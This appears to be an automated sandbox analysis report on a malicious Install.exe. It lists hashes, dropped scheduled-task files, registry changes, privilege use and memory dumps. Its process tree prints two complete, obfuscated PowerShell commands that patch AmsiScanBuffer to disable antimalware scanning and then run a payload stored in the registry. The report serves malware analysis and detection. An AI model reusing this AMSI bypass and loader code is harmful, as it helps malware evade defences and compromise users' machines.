5917eaf394a1ef0e1dc0cdb4a00260efbf51d1ea20d48ab68f7325cfe4b3ad04

General

Target

Install.exe
Size

2.3MB
MD5

81b999918d94285ca5791aed3c8157fe
SHA1

2578c47353c13cf28468518c79ee5a035beed760
SHA256

5917eaf394a1ef0e1dc0cdb4a00260efbf51d1ea20d48ab68f7325cfe4b3ad04
SHA512

e7b92ccfe60142ea4e2605397104e5f0628c78431ff56a69a4868645b05444ece53679db26a724856f8c4c65d39017c51a467a27714b95f5aceee211ac70734e
SSDEEP

24576:zxUmQ8AhI8IYVw4zv7fYLXX5wktsH7XlUAFFLjlLWJ/Sa3qVBAg/LyMlXk/9pu06:zxxHm7b8LXpw9HXL2/SFNLy7/9prx6

Score

4^/10

Malware Config

Signatures

Drops file in Windows directory 4 IoCs

Processes:

Install.exe

description	ioc	process
File created	C:\Windows\Tasks\$77svc32.job	Install.exe
File opened for modification	C:\Windows\Tasks\$77svc32.job	Install.exe
File created	C:\Windows\Tasks\$77svc64.job	Install.exe
File opened for modification	C:\Windows\Tasks\$77svc64.job	Install.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.EXE

pid process

3112 powershell.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.EXE

description pid process

Token: SeDebugPrivilege 3112 powershell.EXE

pid	process
3112	powershell.EXE

description	pid	process
Token: SeDebugPrivilege	3112	powershell.EXE

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Drops file in Windows directory
PID:4632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rSHXrCyNXcPE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hpURrTXOiRlGdp,[Parameter(Position=1)][Type]$ZsuOXsdTkK)$rLTjxqAHkRe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$rLTjxqAHkRe.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hpURrTXOiRlGdp).SetImplementationFlags('Runtime,Managed');$rLTjxqAHkRe.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZsuOXsdTkK,$hpURrTXOiRlGdp).SetImplementationFlags('Runtime,Managed');Write-Output $rLTjxqAHkRe.CreateType();}$RUhGEGGSiNywL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$dNdWNZwrOfhMrX=$RUhGEGGSiNywL.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$unzOPbzuXyFzpiwtJRg=rSHXrCyNXcPE @([String])([IntPtr]);$OsRMAOQgELrlvxFTQlfowS=rSHXrCyNXcPE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cHhJwbvLWaQ=$RUhGEGGSiNywL.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$niaKEsWHyFueGd=$dNdWNZwrOfhMrX.Invoke($Null,@([Object]$cHhJwbvLWaQ,[Object]('Load'+'LibraryA')));$riXDecegtQDAjcxGp=$dNdWNZwrOfhMrX.Invoke($Null,@([Object]$cHhJwbvLWaQ,[Object]('Vir'+'tual'+'Pro'+'tect')));$sANiVgx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($niaKEsWHyFueGd,$unzOPbzuXyFzpiwtJRg).Invoke('a'+'m'+'si.dll');$ZpKZNyPrdDZItgtTH=$dNdWNZwrOfhMrX.Invoke($Null,@([Object]$sANiVgx,[Object]('Ams'+'iSc'+'an'+'Buffer')));$nYKfMIJMus=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($riXDecegtQDAjcxGp,$OsRMAOQgELrlvxFTQlfowS).Invoke($ZpKZNyPrdDZItgtTH,[uint32]8,4,[ref]$nYKfMIJMus);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ZpKZNyPrdDZItgtTH,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($riXDecegtQDAjcxGp,$OsRMAOQgELrlvxFTQlfowS).Invoke($ZpKZNyPrdDZItgtTH,[uint32]8,0x20,[ref]$nYKfMIJMus);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:3364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pBBBUjbcLVcJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wtqLwmBrKyMlhM,[Parameter(Position=1)][Type]$bfolztjcUS)$LEWEPesZDMl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LEWEPesZDMl.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$wtqLwmBrKyMlhM).SetImplementationFlags('Runtime,Managed');$LEWEPesZDMl.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$bfolztjcUS,$wtqLwmBrKyMlhM).SetImplementationFlags('Runtime,Managed');Write-Output $LEWEPesZDMl.CreateType();}$YKzjyqXghMGws=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$OQLFIryeqvDSak=$YKzjyqXghMGws.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XnoQHXdDakKuMUhaCXT=pBBBUjbcLVcJ @([String])([IntPtr]);$MLwLHLenccKVOwZwswpWBZ=pBBBUjbcLVcJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TgoyfQOYrBr=$YKzjyqXghMGws.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ELgUgIyadxScuC=$OQLFIryeqvDSak.Invoke($Null,@([Object]$TgoyfQOYrBr,[Object]('Load'+'LibraryA')));$draZxigKgkLMaxrRX=$OQLFIryeqvDSak.Invoke($Null,@([Object]$TgoyfQOYrBr,[Object]('Vir'+'tual'+'Pro'+'tect')));$ibHwJky=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ELgUgIyadxScuC,$XnoQHXdDakKuMUhaCXT).Invoke('a'+'m'+'si.dll');$iaNPYSAlGSpBERxQC=$OQLFIryeqvDSak.Invoke($Null,@([Object]$ibHwJky,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WynLmqJKUm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($draZxigKgkLMaxrRX,$MLwLHLenccKVOwZwswpWBZ).Invoke($iaNPYSAlGSpBERxQC,[uint32]8,4,[ref]$WynLmqJKUm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iaNPYSAlGSpBERxQC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($draZxigKgkLMaxrRX,$MLwLHLenccKVOwZwswpWBZ).Invoke($iaNPYSAlGSpBERxQC,[uint32]8,0x20,[ref]$WynLmqJKUm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9f3c7ec5-cfb8-47f6-ac41-658d6aad999d}
1⤵
PID:3492

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/60-157-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/532-160-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/588-155-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/672-156-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/3112-140-0x00007FFAA2B60000-0x00007FFAA3621000-memory.dmp

Filesize
10.8MB

Download
memory/3112-145-0x00007FFAC1490000-0x00007FFAC1685000-memory.dmp

Filesize
2.0MB

Download
memory/3112-153-0x00007FFAC0DA0000-0x00007FFAC0E5E000-memory.dmp

Filesize
760KB

Download
memory/3112-151-0x00007FFAC1490000-0x00007FFAC1685000-memory.dmp

Filesize
2.0MB

Download
memory/3112-149-0x00007FFAA2B60000-0x00007FFAA3621000-memory.dmp

Filesize
10.8MB

Download
memory/3112-141-0x00007FFAC1490000-0x00007FFAC1685000-memory.dmp

Filesize
2.0MB

Download
memory/3112-142-0x00007FFAC0DA0000-0x00007FFAC0E5E000-memory.dmp

Filesize
760KB

Download
memory/3112-146-0x00007FFAC0DA0000-0x00007FFAC0E5E000-memory.dmp

Filesize
760KB

Download
memory/3112-135-0x000001E740F20000-0x000001E740F42000-memory.dmp

Filesize
136KB

Download
memory/3364-154-0x0000000005230000-0x000000000524E000-memory.dmp

Filesize
120KB

Download
memory/3364-136-0x00000000045F0000-0x0000000004C18000-memory.dmp

Filesize
6.2MB

Download
memory/3364-134-0x0000000001910000-0x0000000001946000-memory.dmp

Filesize
216KB

Download
memory/3364-137-0x0000000004390000-0x00000000043B2000-memory.dmp

Filesize
136KB

Download
memory/3364-139-0x0000000004C20000-0x0000000004C86000-memory.dmp

Filesize
408KB

Download
memory/3364-138-0x0000000004430000-0x0000000004496000-memory.dmp

Filesize
408KB

Download
memory/3492-144-0x0000000140075238-mapping.dmp

Download
memory/3492-152-0x00007FFAC0DA0000-0x00007FFAC0E5E000-memory.dmp

Filesize
760KB

Download
memory/3492-150-0x00007FFAC1490000-0x00007FFAC1685000-memory.dmp

Filesize
2.0MB

Download
memory/3492-148-0x0000000140000000-0x000000014033D000-memory.dmp

Filesize
3.2MB

Download
memory/3492-147-0x0000000140000000-0x000000014033D000-memory.dmp

Filesize
3.2MB

Download
memory/3492-143-0x0000000140000000-0x000000014033D000-memory.dmp

Filesize
3.2MB

Download
memory/4632-132-0x0000000000D90000-0x0000000001039000-memory.dmp

Filesize
2.7MB

Download
memory/4632-133-0x0000000000D90000-0x0000000001039000-memory.dmp

Filesize
2.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads